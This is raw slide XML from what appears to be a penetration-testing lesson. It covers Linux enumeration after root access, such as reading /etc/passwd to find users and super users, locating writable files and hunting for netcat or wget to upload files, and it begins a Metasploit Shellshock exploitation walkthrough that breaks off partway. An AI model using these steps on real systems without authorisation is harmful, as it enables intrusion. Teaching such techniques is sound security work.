              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>id, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>, w, last </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/passwd | cut -d: -f1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> list of users</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}’  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> list of super users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/passwd, cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/group </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> sensitive files</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4194563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After gaining root access…</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1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File Systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>find /etc/ -readable -type f 2&gt;/dev/null </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> available to anyone</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ls –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /var/log, ls -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /var/mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> search var folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>find / -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xdev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -type d \( -perm -0002 -a ! -perm -1000 \) –print </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> print word writeable files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>find /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xdev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> \( -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nouser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -o -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nogroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> \) –print </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> no owner files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Preparation &amp; find exploit code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>find / -name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> can do the same for python*, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>* , find installed tools/languages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>find / -name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>*, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>*, ftp, find ways to upload files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>A lot more information in this blog </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1999722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ko-KR" dirty="0"/>
              <a:t>Exploit Shellshock vulnerability</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500" dirty="0"/>
              <a:t>Exploiting Shellshock using the DHCP service on Metasploit. It’s already installed in Kali.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dhclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> to find out your DHCP address on terminal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>In Metasploit, run ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>search shellshock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>’. We will use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>dhclient_bash_env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> which is used for DHCP Client Bash Environment Variable Code Injection (Shellshock)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use auxiliary/server/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dhclient_bash_env</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Run ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>’ to get information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Set up module parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>show options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>set SVRHOST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>your_DHCP_server_IP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3895874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ko-KR" dirty="0"/>
              <a:t>Exploit Shellshock vulnerability</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500" dirty="0"/>
              <a:t>Set the code that you want to inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>throught</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> the BASH shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
